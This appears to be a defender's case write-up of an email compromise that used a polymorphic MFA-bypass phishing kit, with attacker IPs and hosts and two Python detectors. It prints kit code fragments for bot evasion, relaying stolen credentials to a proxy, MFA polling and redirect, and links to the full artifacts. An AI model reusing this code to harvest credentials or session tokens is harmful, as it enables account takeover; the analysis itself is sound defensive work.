
AiTM Phishing Kit

Polymorphic AiTM Phishing Kit

Polymorphic JS core (module.php) + MFA state machine

Not so long ago, in the cesspool of dysfunction that lives in the den of cyber inequity, we came across an interesting business email compromise in which a fascinating phishing kit was used. Similar to Tycoon 2FA with a little extra, the objective was not only to bypass MFA but to pilfer the SessionID token for maximum utility.

Central to this case is the way the code relies on heavily obfuscated and polymorphic JavaScript to dynamically construct page elements, validation logic, and user flow at runtime, rather than exposing a fixed and easily fingerprinted script.

This approach complicates signature-based detection. The case notes focus on how this polymorphic JavaScript framework supports brand impersonation, bot and sandbox evasion, and staged credential collection — all while maintaining a user experience consistent with legitimate authentication workflows.

As always, names have been changed — except for our external entity.

Original artifacts (click-through): https://cybercrypto.net/phishing-module/
In the analysis below, each code excerpt is mapped back to this reference so you can compare the narrative to the original code.

The Incident — Credentialed Access

In this case, “Elliot Kane” (name changed) was a compromised mailbox user within the NorthBridge Medical environment. The message activity was not spoofed. Header artifacts showed a successful MAPI submission:

  • MAPI build: 15.20.9611.008
  • Interpretation: the actor authenticated using valid credentials and sent mail from within the account context.

The Self-Send Maneuver

The attacker sent the message from Elliot Kane to Elliot Kane. Once safely inside the mailbox, it was forwarded outward to “Daniel Reeves”.

This maneuver suppresses first-contact and external-sender warnings and makes the message appear operationally normal before it is weaponized outward.

Signature Replication Clue

The header contained:

x-codetwo-clientsignature-inserted: true

This indicates the environment uses CodeTwo for automated signature injection. The external entity clearly understood this — staging a fallback signature asset to replicate the expected corporate look if automation failed during the unauthorized session.


Confirmed Mailbox Access & Persistence

  • Accessed via Exchange Online
  • Activity window: February 11, 2026 — 20:08 to 20:10 UTC
  • Short smash-and-grab access pattern
  • Immediate persistence through inbox rule manipulation

Observed pattern: access → rapid triage of high-value threads → inbox-rule suppression → exit.

Inbox Rules Created

  • Rule 1: Redirect mail from the primary partner domain to RSS Feeds.
  • Rule 2: Redirect messages containing keywords such as “phishing,” “compromise,” “hack,” or “spam” to RSS Feeds.

If a security alert arrived, it never surfaced in the primary inbox.
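As an added illustration (not part of the original case notes), a small Python detector for exactly this rule pattern, run over constructed Exchange Online unified audit log records. The user names, domains and rule values are assumed for the example; the record layout follows the audit log's New-InboxRule entries, where cmdlet parameters arrive as Name/Value pairs.

```python
import json

# Constructed sample audit records (not from the incident). The layout follows the
# Exchange Online unified audit log, where cmdlet parameters arrive as Name/Value pairs.
SAMPLE_AUDIT_LINES = [
    json.dumps({"Operation": "New-InboxRule", "UserId": "elliot.kane@northbridge.example",
                "ClientIP": "142.111.241.16", "Parameters": [
                    {"Name": "Name", "Value": "."},
                    {"Name": "From", "Value": "partner-domain.example"},
                    {"Name": "MoveToFolder", "Value": "RSS Feeds"}]}),
    json.dumps({"Operation": "New-InboxRule", "UserId": "elliot.kane@northbridge.example",
                "ClientIP": "142.111.241.16", "Parameters": [
                    {"Name": "Name", "Value": ".."},
                    {"Name": "SubjectOrBodyContainsWords", "Value": "phishing;compromise;hack;spam"},
                    {"Name": "MoveToFolder", "Value": "RSS Feeds"}]}),
    json.dumps({"Operation": "New-InboxRule", "UserId": "daniel.reeves@northbridge.example",
                "ClientIP": "10.20.0.5", "Parameters": [
                    {"Name": "Name", "Value": "Vendor newsletters"},
                    {"Name": "From", "Value": "news@vendor.example"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]}),
]

HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "deleted items", "junk email", "archive"}
ALERT_WORDS = {"phishing", "compromise", "compromised", "hack", "hacked", "spam", "suspicious"}
KEYWORD_PARAMS = ("SubjectContainsWords", "SubjectOrBodyContainsWords", "BodyContainsWords")


def classify_rule(record: dict) -> list[str]:
    """Return the reasons a New-/Set-InboxRule record looks like attacker persistence."""
    params = {p["Name"]: str(p["Value"]) for p in record.get("Parameters", [])}
    reasons = []
    dest = params.get("MoveToFolder", "").strip().lower()
    if dest in HIDING_FOLDERS or params.get("DeleteMessage", "").lower() == "true":
        reasons.append("hides mail in " + (dest or "deleted items"))
    words = {w.strip().lower() for k in KEYWORD_PARAMS for w in params.get(k, "").split(";") if w.strip()}
    if words & ALERT_WORDS:
        reasons.append("suppresses alert keywords: " + ", ".join(sorted(words & ALERT_WORDS)))
    if not params.get("Name", "").strip(". ,"):
        reasons.append("rule name is blank or punctuation only")
    return reasons


def find_suspicious_rules(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    # Scan JSON audit lines; return (user, client IP, reasons) for each suspicious rule.
    hits = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("Operation") in ("New-InboxRule", "Set-InboxRule"):
            reasons = classify_rule(rec)
            if reasons:
                hits.append((rec["UserId"], rec["ClientIP"], reasons))
    return hits
```

The two rules created from the attacker egress are flagged on folder, keyword and blank-name grounds; the ordinary newsletter rule is not.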

Representative Data Targeting (Names Changed)

  • FW: Remittance Confirmation — January Cycle
  • RE: Patient Intake Record Update
  • RE: Chart Review — MRN 847219
  • RE: Case Manager — Delivery Coordination
  • Desk Drop: Internal Workflow Adjustment

Total items accessed: 14


Attacker Infrastructure

Type / Indicator / Details

  • Attacker Egress: 142.111.241.16
    Windows Server 2022 (10.0.20348); Ace Data Centers II, L.L.C.; port 3389/tcp (RDP); certificate CN WIN-8OA3CCQAE4D
  • Proxy Host: medegesolutions.alphawreckings.com
    AiTM relay host
  • Resolved IP: 216.126.239.77
    Apache 2.4.58; hostname 77.239.126.216.static.cloudzy.com
  • Reported CVEs (216.126.239.77:80): the scanner-reported CVE list for this Apache instance is omitted here

Technical Analysis — Polymorphic JS Core (module.php)

All code excerpts below are taken from the original kit artifacts posted here: https://cybercrypto.net/phishing-module/

The phishing kit’s central differentiator is its polymorphic JavaScript framework. Rather than exposing static DOM identifiers, it decodes them at runtime.

Phase 1 — Runtime Decoding (module.php excerpt)

Reference: see the “initialization/decoding” section in the artifact page above.


const hbIds = JSON.parse(atob(window[_funcs14.damang]));
const _classes81 = JSON.parse(atob(window[_funcs14.suke]));

Button IDs and class names mutate per session. Static signature detection fails because the DOM is constructed dynamically.

Phase 2 — Honeypot Execution (module.php excerpt)

Reference: see the “honeypot” logic in the artifact page above.


const hps = document.querySelectorAll('.' + _getClass91('honeypot'));
for (let hp of hps) {
  if (hp.value !== '') {
    window.location.href = hbCache[hbProps.random] + '#hp';
    return;
  }
}

Bots that auto-fill hidden fields are redirected instantly.

Phase 3 — Credential Relay (module.php excerpt)

Reference: see the Ajax credential posting logic in the artifact page above.


$.ajax({
  url: hbCache[hbProps.validate],
  data: { em: val, pa: val_pwd },
  success: function(r) {
    if (r.live && r.twofactor) _process2FA88(r.twofactor_info);
  }
});

Credentials are relayed to the proxy, which interacts with the legitimate Microsoft endpoint.

Phase 4 — MFA State Machine (module.php excerpt)

Reference: see the MFA “verify_app” polling logic in the artifact page above.


if (dataUrl === 'verify_app') {
  elementsb176.entropy.innerHTML = r.entropy;
  const intId = setInterval(() => {
    pollAppfedb(intId);
  }, 5000);
}

Instead of breaking MFA, the kit waits for the user to satisfy it — then harvests the resulting session token.

Phase 5 — Clean Exit (module.php excerpt)

Reference: see the final redirect handler in the artifact page above.


const hbHandleFinal = () => {
  if (viewRef === 'final')
    window.location.href = atob(hbCache[hbProps.finalRedirect]);
};

The user is redirected to a benign location while the attacker immediately begins using the stolen session.
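To close, an added example (not from the kit or the case notes) of the check a defender would run against Phases 4 and 5: a session token that was minted after the user satisfied MFA, then used from an IP that never completed interactive MFA in that session. The records are constructed in an Entra ID-style sign-in layout with assumed field names (time, user, ip, sessionId, interactive, mfa); the attacker IP and the 20:08 to 20:10 UTC window echo the case notes, everything else is made up.

```python
from datetime import datetime, timedelta

# Constructed Entra ID-style sign-in records (not from the incident); the attacker IP and
# the 20:08-20:10 UTC window echo the case notes, everything else is made up for the example.
SAMPLE_SIGNINS = [
    {"time": "2026-02-11T20:05:12Z", "user": "elliot.kane@northbridge.example",
     "ip": "203.0.113.40", "sessionId": "sess-A1", "interactive": True, "mfa": True},
    {"time": "2026-02-11T20:08:03Z", "user": "elliot.kane@northbridge.example",
     "ip": "142.111.241.16", "sessionId": "sess-A1", "interactive": False, "mfa": False},
    {"time": "2026-02-11T20:09:40Z", "user": "elliot.kane@northbridge.example",
     "ip": "142.111.241.16", "sessionId": "sess-A1", "interactive": False, "mfa": False},
    {"time": "2026-02-11T08:00:00Z", "user": "daniel.reeves@northbridge.example",
     "ip": "198.51.100.7", "sessionId": "sess-B7", "interactive": True, "mfa": True},
    {"time": "2026-02-11T12:30:00Z", "user": "daniel.reeves@northbridge.example",
     "ip": "198.51.100.7", "sessionId": "sess-B7", "interactive": False, "mfa": False},
]


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_session_replays(signins: list[dict], window: timedelta = timedelta(hours=1)) -> list[dict]:
    """Flag a session token used from an IP that never completed interactive MFA in that
    session, within `window` of the MFA-satisfied sign-in: the AiTM replay signature.
    A new IP that performs its own interactive MFA (roaming, VPN) is treated as legitimate."""
    by_session: dict[str, list[dict]] = {}
    for rec in sorted(signins, key=lambda r: _ts(r["time"])):
        by_session.setdefault(rec["sessionId"], []).append(rec)
    alerts = []
    for sid, events in by_session.items():
        trusted_ips: set[str] = set()
        mfa_time = None
        for ev in events:
            if ev["interactive"] and ev["mfa"]:
                trusted_ips.add(ev["ip"])
                mfa_time = _ts(ev["time"])
            elif mfa_time and ev["ip"] not in trusted_ips and _ts(ev["time"]) - mfa_time <= window:
                gap = int((_ts(ev["time"]) - mfa_time).total_seconds())
                alerts.append({"user": ev["user"], "sessionId": sid, "origin_ips": sorted(trusted_ips),
                               "replay_ip": ev["ip"], "seconds_after_mfa": gap})
                trusted_ips.add(ev["ip"])  # report each new IP once per session
    return alerts
```

Elliot's session is flagged once, 171 seconds after the MFA-satisfied sign-in, from the egress IP; Daniel's same-IP refresh is not.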